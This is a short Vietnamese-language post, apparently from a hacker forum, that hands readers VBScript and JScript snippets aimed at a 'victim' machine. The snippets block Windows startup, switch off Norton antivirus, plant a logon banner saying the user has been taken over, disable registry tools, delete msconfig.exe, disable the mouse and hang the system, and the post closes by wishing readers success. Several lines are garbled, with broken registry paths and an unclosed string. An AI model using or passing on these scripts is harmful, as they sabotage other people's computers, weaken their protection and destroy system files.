1.Không cho victim khởi động máy: Dim wsh Set wsh = createobject(“wscript.shell”) wsh.run “RUNDLL32.EXE user.exe,exitwindows” 2. Disable NAV: Dim wsh Set wsh= CreateObject( “WScript.Shell”) s1 = “HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servi c es\Norton Program Scheduler\Start” wsh.RegWrite s1,3, “REG_DWORD” 3. Hiển thị một message mỗi khi reboot máy: dim wsh Set wsh = CreateObject( “WScript.Shell” ) s1 = “HKLM\Software\Microsoft\Windows\CurrentVersion\Wi n Logon\” s2 = “LegalNoticeCaption” s3 = “LegalNoticeText” wsh.RegWrite s1+s2, “http://allformy.topcities.com” wsh.RegWrite s1+s3, “Ta la anh_hung_bat_dac_di000-Toi den tu HVA” 4. Hiển thị một dòng lệnh khi click vào file hay folder:, set reg=createobject(“WScript.shell”) reg.regwrite “HKEY_CLASSES_ROOT\*\Shell\\”,”Ban da bi toi khong che” reg.regwrite “HKEY_CLASSES_ROOT\folder\shell\Ban da bi toi khong che”,”I_LOVE_U” 5. Làm cho các trò trên hoạt động bình thường: Dim objShell Set objShell = CreateObject( “WScript.Shell” ) s1 = “HKEY_USERS\.Default\Software\Microsoft\Windows\Cu rrentVersion\ ” s2 = “Policies\System\DisableRegistryTools” objShell.RegWrite s1+s2,1, “REG_DWORD” Dưới dạng Javascipt : var wsh; wsh=new ActiveXObject (“Wscript.shell”); // Winlogon when reboot var s1 = “HKLM\\Software\\Microsoft\\Windows\\CurrentVersio n \\WinLogon\\”; var s2 = “LegalNoticeCaption”; var s3 = “LegalNoticeText”; wsh.RegWrite (s1+ s2, “http://allformy.topcities.com”) ; wsh.RegWrite (s1+s3, “Ban da bi toi khong che”) ; //Disable Registry var s1 = “HKEY_USERS\\.Default\\Software\\Microsoft\\Window s\\CurrentVers ion\\”; var s2 = “Policies\\System\\DisableRegistryTools” ; wsh.RegWrite (s1+s2,0,”REG_DWORD”); //Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn var fso; fso=new ActiveXObject(“Scripting.FileSystemObject”); var fe=fso.getfile(“C:\\windows\\msconfig.exe); fe.delete true; //Shutdown windows //Disable Mouse wsh.run (“RUNDLL32.EXE mouse,disable”); //Hang up windows wsh.run (“rundll32 user,disableoemlayer”); chúc các bạn thành công nha ^_^
